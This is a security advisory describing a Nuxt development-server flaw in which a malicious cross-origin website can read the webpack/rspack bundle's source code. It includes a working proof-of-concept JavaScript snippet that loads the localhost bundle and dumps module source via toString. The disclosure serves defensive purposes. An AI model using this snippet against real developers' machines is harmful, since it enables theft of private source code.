GHSA-4gf7-ff8x-hq99

Summary

Source code may be stolen during dev when using webpack / rspack builder and you open a malicious web site.

Details

Because the request for classic script by a script tag is not subject to same origin policy, an attacker can inject <script src="http://localhost:3000/_nuxt/app.js"> in their site and run the script. By using Function::toString against the values in window.webpackChunknuxt_app, the attacker can get the source code.

PoC

1. Create a nuxt project with webpack / rspack builder.
2. Run npm run dev
3. Open http://localhost:3000
4. Run the script below in a web site that has a different origin.
5. You can see the source code output in the document and the devtools console.

   const script = document.createElement('script')
   script.src = 'http://localhost:3000/_nuxt/app.js'
   script.addEventListener('load', () => {
     for (const page in window.webpackChunknuxt_app) {
       const moduleList = window.webpackChunknuxt_app[page][1]
       console.log(moduleList)
   
       for (const key in moduleList) {
         const p = document.createElement('p')
         const title = document.createElement('strong')
         title.textContent = key
         const code = document.createElement('code')
         code.textContent = moduleList[key].toString()
         p.append(title, ':', document.createElement('br'), code)
         document.body.appendChild(p)
       }
     }
   })
   document.head.appendChild(script)
   

It contains the compiled source code and also the source map (but it seems the sourcemap contains transformed content in the sourcesContent field).

Impact

Users using webpack / rspack builder may get the source code stolen by malicious websites.